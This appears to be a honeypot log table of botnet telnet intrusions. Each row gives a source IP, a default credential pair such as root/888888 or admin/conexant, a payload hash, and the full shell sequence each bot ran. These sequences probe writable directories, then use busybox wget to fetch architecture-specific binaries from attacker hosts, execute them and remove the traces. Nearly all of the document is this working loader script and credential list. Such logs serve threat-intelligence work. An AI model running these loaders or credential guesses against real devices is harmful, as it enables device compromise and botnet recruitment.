| IP address |
User name |
Password |
SHA256 of the payload file |
 172.245.52.231
| supervisor | zyad1234 | 7d1e55a85e06514d3d5e40da3f67c202a62c6b808b13491d1d2e42be89920755 |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf Iwsrfg Cewsrghs
/bin/busybox cp /bin/busybox Iwsrfg; >Iwsrfg; /bin/busybox chmod 777 Iwsrfg; /bin/busybox AA
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox AA
/bin/busybox wget; /bin/busybox tftp; /bin/busybox AA
/bin/busybox wget http://172.245.52.231:80/bins/spc -O - > Iwsrfg; /bin/busybox chmod 777 Iwsrfg; /bin/busybox AA
./Iwsrfg loader.wget; /bin/busybox SYLVEONA
/bin/busybox rm -rf Cewsrghs; >Iwsrfg; /bin/busybox AA |
172.245.52.231 | maintainer | admin | a0a4652281913281d5387b3009bc49c810cda8f7f082b4922ed2620fe1c535ad |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf Iwsrfg Cewsrghs
/bin/busybox cp /bin/busybox Iwsrfg; >Iwsrfg; /bin/busybox chmod 777 Iwsrfg; /bin/busybox AA
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox AA
/bin/busybox wget; /bin/busybox tftp; /bin/busybox AA
/bin/busybox wget http://172.245.52.231:80/bins/mips -O - > Iwsrfg; /bin/busybox chmod 777 Iwsrfg; /bin/busybox AA
./Iwsrfg loader.wget; /bin/busybox SYLVEONA
/bin/busybox rm -rf Cewsrghs; >Iwsrfg; /bin/busybox AA |
172.245.52.231 | root | 888888 | e4ecfbec887032ab0448c1334d5a886fbd24a2c7dbd3523e52975b011e4a706e |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf Iwsrfg Cewsrghs
/bin/busybox cp /bin/busybox Iwsrfg; >Iwsrfg; /bin/busybox chmod 777 Iwsrfg; /bin/busybox AA
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox AA
/bin/busybox wget; /bin/busybox tftp; /bin/busybox AA
/bin/busybox wget http://172.245.52.231:80/bins/sh4 -O - > Iwsrfg; /bin/busybox chmod 777 Iwsrfg; /bin/busybox AA
./Iwsrfg loader.wget; /bin/busybox SYLVEONA
/bin/busybox rm -rf Cewsrghs; >Iwsrfg; /bin/busybox AA |
172.245.52.231 | admin | conexant | f467f206c053fb88418b4326d9a3bddf2d447023ccc2ac54cad3080ba0b161ab |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf Iwsrfg Cewsrghs
/bin/busybox cp /bin/busybox Iwsrfg; >Iwsrfg; /bin/busybox chmod 777 Iwsrfg; /bin/busybox AA
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox AA
/bin/busybox cat /proc/cpuinfo || while read i; do echo $i; done < /proc/cpuinfo; /bin/busybox AA
/bin/busybox wget; /bin/busybox tftp; /bin/busybox AA
/bin/busybox wget http://172.245.52.231:80/bins/arm -O - > Iwsrfg; /bin/busybox chmod 777 Iwsrfg; /bin/busybox AA
./Iwsrfg loader.wget; /bin/busybox SYLVEONA
/bin/busybox rm -rf Cewsrghs Iwsrfg
/bin/busybox cp /bin/busybox Iwsrfg; >Iwsrfg; /bin/busybox chmod 777 Iwsrfg; /bin/busybox AA
/bin/busybox wget; /bin/busybox tftp; /bin/busybox AA
/bin/busybox wget http://172.245.52.231:80/bins/arm7 -O - > Iwsrfg; /bin/busybox chmod 777 Iwsrfg; /bin/busybox AA
./Iwsrfg loader.wget; /bin/busybox SYLVEONA
/bin/busybox rm -rf Cewsrghs; >Iwsrfg; /bin/busybox AA |
172.245.52.231 | 2323 | | 7d1e55a85e06514d3d5e40da3f67c202a62c6b808b13491d1d2e42be89920755 |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf Iwsrfg Cewsrghs
/bin/busybox cp /bin/busybox Iwsrfg; >Iwsrfg; /bin/busybox chmod 777 Iwsrfg; /bin/busybox AA
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox AA
/bin/busybox wget; /bin/busybox tftp; /bin/busybox AA
/bin/busybox wget http://172.245.52.231:80/bins/spc -O - > Iwsrfg; /bin/busybox chmod 777 Iwsrfg; /bin/busybox AA
./Iwsrfg loader.wget; /bin/busybox SYLVEONA
/bin/busybox rm -rf Cewsrghs; >Iwsrfg; /bin/busybox AA |
172.245.52.231 | netadmin | | a0a4652281913281d5387b3009bc49c810cda8f7f082b4922ed2620fe1c535ad |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf Iwsrfg Cewsrghs
/bin/busybox cp /bin/busybox Iwsrfg; >Iwsrfg; /bin/busybox chmod 777 Iwsrfg; /bin/busybox AA
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox AA
/bin/busybox wget; /bin/busybox tftp; /bin/busybox AA
/bin/busybox wget http://172.245.52.231:80/bins/mips -O - > Iwsrfg; /bin/busybox chmod 777 Iwsrfg; /bin/busybox AA
./Iwsrfg loader.wget; /bin/busybox SYLVEONA
/bin/busybox rm -rf Cewsrghs; >Iwsrfg; /bin/busybox AA |
 94.102.63.52
| SSA | SSA | e9d22dc00e7dfce396ce6c1eaf6d041a156656e2dd9a2f21619155d68bf518ba |
enable
system
shell
sh
linuxshell
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf .updater aresupdater
/bin/busybox cp /bin/busybox .updater; >.updater; /bin/busybox chmod 777 .updater; /bin/busybox DARK
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox DARK
/bin/busybox wget; /bin/busybox tftp; /bin/busybox DARK
/bin/busybox wget http://94.102.63.52:80/33bi/Ares.spc -O - > .updater; /bin/busybox chmod 777 .updater; /bin/busybox DARK
./.updater telnet; /bin/busybox ARES
/bin/busybox rm -rf aresupdater; >.updater; /bin/busybox DARK |
142.11.222.100 | root | linux | 40e7e5e41ca5868605b36634949bf6ce25d002766d4eb6e146499db90aacb4c2 |
sh
..
linuxshell
shell
enable
system
hostname SEFA_ID:4280
/bin/busybox SEFA
/bin/busybox ps; /bin/busybox SEFA
/bin/busybox cat /proc/mounts; /bin/busybox SEFA
/bin/busybox echo -e '\x6b\x61\x6d\x69/proc' > /proc/.nippon; /bin/busybox cat /proc/.nippon; /bin/busybox rm /proc/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/sys' > /sys/.nippon; /bin/busybox cat /sys/.nippon; /bin/busybox rm /sys/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/tmp' > /tmp/.nippon; /bin/busybox cat /tmp/.nippon; /bin/busybox rm /tmp/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/overlay' > /overlay/.nippon; /bin/busybox cat /overlay/.nippon; /bin/busybox rm /overlay/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69' > /.nippon; /bin/busybox cat /.nippon; /bin/busybox rm /.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/dev/pts' > /dev/pts/.nippon; /bin/busybox cat /dev/pts/.nippon; /bin/busybox rm /dev/pts/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/sys/kernel/debug' > /sys/kernel/debug/.nippon; /bin/busybox cat /sys/kernel/debug/.nippon; /bin/busybox rm /sys/kernel/debug/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon
/bin/busybox SEFA
cd /
/bin/busybox cp /bin/echo sefaexecbi; >sefaexecbi; /bin/busybox chmod 777 sefaexecbi; /bin/busybox SEFA
/bin/busybox cat /bin/echo
/bin/busybox SEFA
cat /proc/cpuinfo; uname -m; /bin/busybox SEFA
/bin/busybox wget; /bin/busybox tftp; /bin/busybox SEFA
/bin/busybox wget http://142.11.222.100:80/ABCDEFGHIJKLMNOPQRSTUVWXYZ/whoareyou.arm -O - > sefaexecbi; /bin/busybox chmod 777 sefaexecbi; /bin/busybox SEFA
./sefaexecbi arm; /bin/busybox AFES
/bin/busybox wget; /bin/busybox tftp; /bin/busybox SEFA
/bin/busybox wget http://142.11.222.100:80/ABCDEFGHIJKLMNOPQRSTUVWXYZ/whoareyou.arm7 -O - > sefaexecbi; /bin/busybox chmod 777 sefaexecbi; /bin/busybox SEFA
./sefaexecbi arm7; /bin/busybox AFES
/bin/busybox SEFA |